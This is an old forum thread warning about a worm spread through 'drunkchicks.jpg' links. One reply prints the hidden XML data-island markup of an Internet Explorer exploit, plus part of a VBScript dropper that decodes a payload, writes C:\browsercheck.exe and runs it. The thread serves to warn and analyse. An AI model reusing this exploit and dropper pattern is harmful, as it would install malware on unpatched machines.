Announcement

Collapse
No announcement yet.

New worm/virus drunkchicks.jpg

Collapse
X
  • Filter
  • Time
  • Show
Clear All
new posts

  • New worm/virus drunkchicks.jpg

    [16:25] -O- (Broadcast) WARNING: There is a new worm spreading around. If you see a message with a URL that looks like: 'http://www.kromberg.at/<censored>=drunkchicks.jpg LOL' do NOT visit that link. If you have visited it already you have gotten infected, and you are advised to remove c:\browsercheck.exe

    here's is the image for you that only uses msiexplore
    http://svartis.punkcookies.com/~jol/jol's_desktop.jpg
    -
    My cars
    -

  • #2
    This is the newest IE exploit going around. There's a version of it going around on AIM where you will get a IM from an buddy that has the virus telling you to visit a website.

    Simple FIX: DON'T RUN IE. Its sucks and its full of un-patched holes that can lead to problems like this. Some are more then 2 years old. Use mozilla.

    Here's the exploit

    Code:
    <div style="visibility:hidden;position:absolute;top:30px;left:20px;z-index:2">
    <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
    <xml id="oExec">
        <security>
            <exploit>
    
                <![CDATA[
                <object id="oFile" data="drunkchicks.php"></object>
                ]]>
            </exploit>
        </security>
    </xml>
    </div>
    that passes you to a drunkchicks.php which opens up the exploit

    Here is a section of it

    Code:
    function res(x,y)
    	For k = 0 To UBound(v)
    		v(k) = Replace(v(k), x, y)
    	Next
    End Function
    res "z", "ff"
    res "y", "00"
    For m = 0 To UBound(v)
    	it = it & v(m)
    Next
    tmp = Split(it, ",")
    Set WshShell = CreateObject("WScript.Shell")
    Set WshEnv = WshShell.Environment("Process")
    pth = WshEnv("HOMEDRIVE") & WshEnv("HOMEPATH") & "\browsercheck.exe"
    pth = "C:\browsercheck.exe"
    
    Set fso = CreateObject("Scripting.FileSystemObject")
    
    Set f = fso.CreateTextFile(pth, True)
    For i = 0 To UBound(tmp)
    	l = Len(tmp(i))
    	b = Int("&H" & Left(tmp(i), 2))
    	If l > 2 Then
    		r = Int("&H" & Mid(tmp(i), 3, l-2))
    		For j = 1 To r
    		f.Write Chr(b)
    		Next
    	Else
    		f.Write Chr(b)
    	End If
    Next
    f.Close
    WshShell.run("""" & pth & """")
    the payload is encoded. I don't know VB all that well but it looks like simple ascii encoding. If i get bored I'll see if i can decode it
    '98 Explorer Sport
    http://mp3car.zcentric.com (down atm)
    AMD 800mhz 192megs RAM 60gig hard drive 9 inch widescreen VGA
    80% done

    Comment


    • #3
      Or you could actually keep IE (and windows for that matter) patched. But Mozilla is good too If only the tabbrowser pluggin worked 100%, I'd have fully switched, as it is, I still run both.
      -Nick

      _____________________________
      Since when is insanity a bad thing?
      www.mp3vw.com

      Comment

      Working...
      X